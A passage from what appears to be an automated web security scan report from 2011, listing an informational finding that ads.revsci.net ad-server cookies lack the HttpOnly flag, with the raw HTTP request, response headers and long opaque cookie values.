yype1hT2E4N3Jz6PCWhkiMwJIkgz0ZV60noN99e60sN3sfjMlaSUvCnqBEHnWsNGcWpiWzaqTQYH01WmFcGUiBwcIwP9yENfV7qD5pGbclaX/fMQ8zGaCoiT2x+8rOcOVW6zzz/jMW/uEgB53hI0NFrVpy7HKRCSVbgLGXh3a7tWMGkWzEkgnwfE+IHXW0ExUEx8PRu4SNGZLdstApKKA7YqNlnC//obhpOTt0QPkXia6St/Xqi9gEUY54cRi+MhRvJsrMT4lysJpIJek5TiklcGRcDBYO6bveJBnB00r1b0iTRb4zRlSPOoqPOjF7H2BmZJLqGd4zGgMiJBcVEm+YKZW3H0JTNTImYiO1ZAza2n/Y1CCVIcAuuUQ6QAwm9HDKbcPmYbo0vBTadkQGz4rmqCwbH696fjdX0o8gKgvhVfRSlHw7YR5mGfZ6USQOoOuyFt7Dyf5gZe8EpcOFmn5IEzqcuPEUCWR+uDPe/Vv"; NETSEGS_G07608=82f4957c1a652091&G07608&0&4e256477&1&10002&4dfeaccb&1f1a384c105a2f365a2b2d6af5f27c36; rtc_N2gr=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; rsi_segs_1000000=pUPF40mhOXMQJ/AtY6gq+mlXT522ui4UYAcRGaESFrJx8TYUFUcMpoM7enamDct4VKj1xrFdOTqQUQ3pUP1MDghOnCvRZ0214o3xUtaZ68nIc1VnMLmCIeegv3Y1WwDp8AIdZ5hqHKU38yRCkO6EVyoNTQYIOyyB1bbJfhYCtxeN4FAMThtqRqzLjZec6jzqKUqLrjFKfNTfGk4gg0636KgeJeemkPacnGpzcBVfhaHGh5+5HatXnwl381BaqY81KvvzuBGONoXhIx83OpFD1tR3YfP3a7TkLLmV2qsPCs2IcxdTv8Z16030H4XyXKyhS7zAQxpqNX2/4kAmja7XaES27kxmvzOlOPMbUj6Cm3SfhwUTUthzNXzAtwRv6N00BGCYDAEY0T/+ocHSxN122t3XU3Lo1znyYeQ5gm98FTKbZYCcHFYUxDfLnpQh/6WqsBCfkrnJY6wvtK/jYdP7J9OWHJkd7czh0TuDEHoC49Ec5JTCdMeKygbXcL5Lf3iaMe9U018EYDX8emPwX8aTEio9Ynai0hDVaDgWj97fMo3h52SvvCg+a19cEIM3kBs+74ch0R+eVGZ+XE7xwIhKXTKkfJdg/3giiKh210fg/DaUe0yC7PRLTYPHOA+VejPfTuHoHDTX+/kUH2Zmc9IQpJmuppdilLBRA2hqW5r1TlfG4514tvrmi17RqHW6+HrVV40axtQ8MF8jfSxfZkXojxtpdBcKyJ9yZNzbCDC3ghRqJkiyUvtT2jSVAmK/flOnpnuLsUg3lzgJ; udm_0=MLv3NzMJZjpnHtrXt87ROWQqVeBQc0PnE+r2ns7XHkf2ZRcUqjtD5UIQ0/jLsj29r+/Y16sE8/FRCjBhUPY9cJ46Mz46HcFiaFRQsYyRsqWWDzq7gTMDVqOko1XJbuk+B7k4qxzo9gCeku8e7tqV3rZqC8KC0SMGkX3URQtLMUhhx1FLTSD5sAAgSRM/eNdzQ19gi6t26LaYRlU+4ydWYNgqgrYjePhtRgTGlSChvYDcFzIoUDlJI+oDU+uWyzmULVKxCAqAtCbpnOS4rvrb5hyAGWz7H/EhXrlsvMcSnm5yZXpT0mGCBG4dbA7+ZTxWfzqr4BHjMDipXgq8PuQRbwXHMfBuHtzPv5/EIxZ+qm6m2gT7LWl4MB4qMElnWwC/o+QpEHrEP3lsxjoBL35B1qa4zqxVeQTT4C+AVOtONznG42bm7Ch73/0XB7cULyBLPX1ILy3zLp4elp2bq+koh8Jyyy1n8rV/LNIoZn/fEPA754BrvUiybXzsUCZu8yvNzPEVOUJbgIzCk3AtnFh+2RyyOUjDMTJ9Td+hG0cb6pdu2xUbU1+brnfgXAI+SPK8IBqKhrj5RPFpojzohpt0flKTMsDgwoxdGeNI4UYkZ3UllAVfJ2fY7ixKxuxyRvxYAhcs1HyNmpeDC8/MLP9aNcMU7xwatTDpvLk0quioGfw4sMlpxmEopiraHgupFfs6bRAk8vNpDz/oU9VK9LhalkBXnjMMi8inHwaGipzISzq/xYWKbYAOsZStrhJqTHAs3RGfn2koH8UT2E7cqL2/5FrJGaWuiPPGYl/Wreupq5ayBPAGgo59EufSp+VqMV2IgS3ec9h+dI7fAQyBse6Y++QgB9xjsZWZuZ3y6ogXia/YyLAqF68bk8mjwra6WTn2YdwklCME9Q+BNUD5REw8maAZ5JmMe6jnyBfNPWaaDZobOHbL4+7KJaDpjiiSVidy9HjW/NXOaKo8mdmrcW2pV20oecZiQh4iDdeQiUl3YOn9Xaa5+yeLm4eaCRzCWNtrWdSBh29ie3tKWzZatTfj/eMvMXvE+qd1U6tB+lWYWAqpQzYG7kHEF6nA6ZC9wmoTEsOhbNqRPCQfC42/PlJM/EE+Kc3LZlvSq0vwK4rauuUb2JKKNXWWcQlLCaLU4jiJuC8BtXS3+14p2L8Ssj12LLudoRtryJU+TP42hRiJXjyB2g1CxPzJVX0OKn3BScvVic2hdPWzWK1jUqJYA9PXyMXSBSo5R8ms7E5bZyy6CQgKbzGOAk4Vm1wIti6twX7w0QVb0Gc2hmFUaVVtEiiREw2aKMzw6IAuWPEqblMmOsIK9+C94LQ11y5y3OBTI9fUKwU16sNjqKN3128EUzidi8Cps5gm3gN5a3FGUMEVAQja2Rf9noQORuveOKKFKqdK5pWQGqJd+ZsU33PiyQ8YvMEAAF7soJtL4z/fM2lNydzHukZWhZXafJlc308LzgM0NsQpjOTsWCgqAshHauUwF00woRQ/wKi3MeorQd46MCm/hP0uMOGdLrcpUqvPSbrZentREnIOOG7Q6DOgJyjLD/29ZTrdkrMivCXAhXQE0GEnJ3NgZVOEJZR0Bgy0WjUDc89YBtP0LJbBZfDnontLVmlzELelhF/WSIPHJIEAqOat+NQrGoqxZczs+DuCF5ji7BtdFa3jqFuzQ2ZULRMYA/TSb7d3qCb0XZxUMxrBzZdDMjXPUsnTzTxRVb5MbATonov2pRvo9JFJIMsw7Rih5jikLef5Wy5mDtucWgVIB4I=

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_x5er=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_lwqf=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_x5er=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_lwqf=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_1Kc5="MLsXtTENJApvJ5G+CtKgxLFQnfhOvCZv6FO6CurHXyYWkAe+Easvolr+8h/hlLolJXfHH1R2xVtDscJ70PLT/+809mgUaJ5mTFeMH5/cdQ1oQMzjQrR8lT1kMQ7bzpbC9YrXitTYyvZMM7dP4X0FE4fLVQT35pwmHJMjeULAg9+Bg9j2pt4T+Bil+yJVkZKHhA6o678iRjiJMPfG6wwANbikhywOGtfmMiOndWnapurGYT+mXqNaIxywxWjyHixOV2MmttktQ7n/s1JIyPfuNTy6RoZFymhaYv4K1CxTW5D2KVK5tCgCbyuo1rwC69C+v/IuDeE6aJ61YjmUNAIN4AFAIXUYGz1WZlcVZqPfVcL8IPe6zX7fXbCi2bc8ywC87epLflVMoerTEodXeL9SBn70Xhw5lcP15HielZUpYNyDg0N0zZUIM+0JsxprAQSiEgnYvoprWsXU6DTVmIFEsuidLnUJlYYOJtxZEDkEABBv7NT27l8LGl/yIDZhjgij0HYVYfLzzBGc3/Zi5OKew/Am5f0lo+6Yw3wf1tLyLatjtijbv95GzxvjVBoKEgmj2uhUORLdFjkAwAh309Sb+i/PE/BXzcebGGN9+yusxQ83We0isURCSAX4EPCjXKTXe644RprGK/ovXStUZLTpD35VCFkTrUaO8VqMv/hl9kYcwQ2n9IAaY+/NgH86zYd6G9X3H6Sssap4VA0D62aDit0V8PHhJkjIsGKEKgwWP2ZRWiZsUrnTcRiFgWghVJQgUwxPA89iBBfCp6OV79l3ch09a8prWj4WzUFShpHgZWm6G857lM/Up/cD6d0nqw/UdxHf8B+jwrHBdltXD+FuIWKXFb+RwRd8ynfoc9VsphzmXzOSgPkYuxQ7hsHV0Hq/HJHSzW/LYXy/9h2M8O+tc+1oIlmaxhfvZiMqStfUsdh9L0klPVQG17Jaku/axTNUBasimo15hj6/R/83msTCxsK/ibsuarY2lOyAzY6Q0sKGiLBGtg5AD/GL1k3MunISFgHwVvqkOES3D7Xaxd2FOgJUok1kNo1Cm+EVSt8/RqmzMs9cQZRcQa7d3Zqw69m/rMnt1cqAjaZReekrd/gx95bcJSqtCoLaHTwGIgtKx8TbbafXtrBLKj7lRHF2yEOzwn+Hva6YZQOzh6L5z62t2XHyf4l49gbIFGQQ4gEl6lt+9qOiV/etCO5e5tcsubEmJ1O7NU0L0y32gbvVu6ZghCHF6eErhYxKB+uF99qGw7fT6qEwqjoP2cjDX3M1CA4qMQBfMOZr4xEG93vu+i9zYjr9xFJHA/txVLLWfK/bAKKmN6fqLbcY2pW5lpqW+DKNi6xLKXmhCJt0YP0gMlFmQMsihPn4MV2v59cKlLSELXAgqbss7TVL5/B0TuuGU260dpfoFeu/WPk7u692kEmK/35h0RMwc0jbzF6vxnRGrAaILWXqGPCqh6+m6klAECZ3k8Pip7U9FzhBNFsrRNlmJKqdqKMFjwz5rabHXZLVOXOXedIPKkEK/6XjPQsOHXAgqbxODNSx6V/1JTWTSDMGCmB+byRP++NOZtgq4TmLWKiCCOorMLnJvQPErJgDh+B8gA=="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="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"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Content-Type: application/x-javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Thu, 23 Jun 2011 11:12:00 GMT
Content-Length: 541

function rsi_img(p,u,c){if(u.indexOf(location.protocol)==0){var i=new Image(2,3);if(c){i.onload=c;}
i.src=u;p[p.length]=i;}}
function rsi_simg(p,s,i){if(i<s.length){rsi_img(p,s[i],function(){rsi_sim
...[SNIP]...

8.10. http://ads.revsci.net/adserver/ako previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.revsci.net
Path:	/adserver/ako

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rsiPus_oJjm="MLsXtTPtJzpvJZG+wNyGBujwiYNk7SFCxPYIhapH/IGgu8fvW/7KPaGxWqTZFTkDb1sV9WOkX/+4J9exogBS/W8+PGyhBWzrdaAnGae4NpMotzSX3+fbscKgY/DWqapdjtT2qzUsVTV6Th6TO+kyXRu9fLtLw7vLwXnP5fnsu9+NlSRLiaJDkMuFliEf9YvaMjspmYt7E04OrDV/IsZUzRCiACYJUbSk06G9ZmN9h9NgyIr5FvCdnll+3wHTsoDnywXw3tZMJoS03uc587n7YXcmOxPh3+MOvoXktyzzD4Z48gvSLJMJpwFjzLw/OQQSvlSH3Vyqzvz+B6NOezUmDnMM6DJabgBJH880uYDKg90Dsd2YVnT4fgILqcaPrnmYkodFavvqHEWjmSPwbYF02muaHAAF4tpqRPcq09KqJ1xU6gCiS54lEYaZ8EWjqLJmJmw/He8mJ2nubAESlT4mv+uYQKNjhqAJ8MAd72HjqFV/GxMRX+29jo9VCZG1OuoNOD3mx5KMUSaJmeIPt50vJFqPkGH0gOY9/jGKFx5TxJvidm+LSTFySpjOAqKL40vw7tUKcBkSUKNKBjFo2q79oM6rPyJ+sVOYW2NdkC+jxXGHWO2asCRCSJVivoCWRUP0TiUR/zP3qRxiynPLU8lQMRG/whXlNxRV7fQl135FeZrQH0b0BlJ/VBo6GhbwAR0TsdWcsfdXrqOTgGOCkVyG2IzFJ+l2/pNhq8A3ZImb9RO7rHEbuPHlmswMqfghlJsgUwz3on17Tfo+WMi7tRJ/tarVetQFrFoymgmMLwpXGBzwOFuQgKts/0kN2e1apqwUgyRvLvuFjDu5vOyGhFqczB/jg3EAXtmuo5KolGEcMBVBy2i0HKK38Yp1vVpITc0foB+i3o0LHSeCfptjsnGPDPCRNqDxBkV/GL7SrC570lKpwTKPmMBpekAMsPSWWsdhaMJHlI2YGZv5XZCJ6e/bhx/Bwc8B1ECZtV8Os1TKs8GGtfNZQ+7+XrqZbKo7Bg0R+TcmXPDWqHBSoJRpS6MEOY9qIEJnzfEO5CspC14SRNUYfy4EN2YSMeFCwbHaTRq6PBlI3YSnbBgBjEUOdiRfZYFBw3z2kq9Xwik18Hwnd3LCfOMfi8ZfOrZm02ilpkHrAxvmWcMWZ+siww8KxcTCXYrhwRUe6w8/3f0lpRamp1EhK02b16hIAO5QosZIfkUX+H3kUTDm6dNiQRpTWp8CMcp0Fc4N9hiKef3Gn7KSeB8Pi4SQmYOlJQisnsHlYi5EnUaloxDPDlETisJnGzC4xvinBGMuB4TBQrFgzVk1JfriXBtIM5rlOI0ZnpqXkwme3oGAAT9d0tJzJTxzaXzrGoxD9FhCY6YcJK+VoFezEglxBSlCKHbhSjYjoAy/nBghesQCOg1UOKHb0MONmzl0k6RjPkfbUQAgKCfxGIkc95u66lxjklLwoA0ttUIqQOlfuRFQ4AuT/4bi0yM2KwZb5/f33lauy9Y5aoa8S7qyOhHFR6gSeN9xEjs+6zNAyp1fasWiQcitQN19+KbXB8xbuNe9mgBZMjxoJhR14xEh72F9ZyN93eqG/MpGh9hTIXcOfiU="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
rsi_us_1000000="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"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?activate&csid=G07610 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.vitimb.com/new-inventory
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_I07714=82f4957c1a652091&I07714&0&4e047730&0&&4ddc9a7b&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05539=82f4957c1a652091&K05539&0&4e047732&1&10592&4dddf043&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_B08725=82f4957c1a652091&B08725&0&4e047743&0&&4dde0faf&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E05516=82f4957c1a652091&E05516&0&4e047779&0&&4dddf225&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_C07583=82f4957c1a652091&C07583&0&4e065339&0&&4de08ea4&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06543=82f4957c1a652091&A06543&0&4e091f12&0&&4de303e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05540=82f4957c1a652091&K05540&0&4e0bcd60&0&&4de5e0dc&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_L09855=82f4957c1a652091&L09855&0&4e0bd03c&0&&4de5b5e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06546=82f4957c1a652091&A06546&0&4e0d143b&0&&4de6f601&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F10931=82f4957c1a652091&F10931&0&4e0dae7d&0&&4de84145&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A09801=82f4957c1a652091&A09801&0&4e1ada42&0&&4df59bf8&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I09839=82f4957c1a652091&I09839&0&4e1adc15&0&&4df58b38&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e1adc2a&2&10055,10194&4df57f23&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E06560=82f4957c1a652091&E06560&0&4e1ee036&2&10654,10670&4df8474d&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F07607=82f4957c1a652091&F07607&0&4e205ae3&9&10024,10124,10066,10080,10076,10085,10133,10143,10152&4dfac4be&1f1a384c105a2f365a2b2d6af5f27c36; 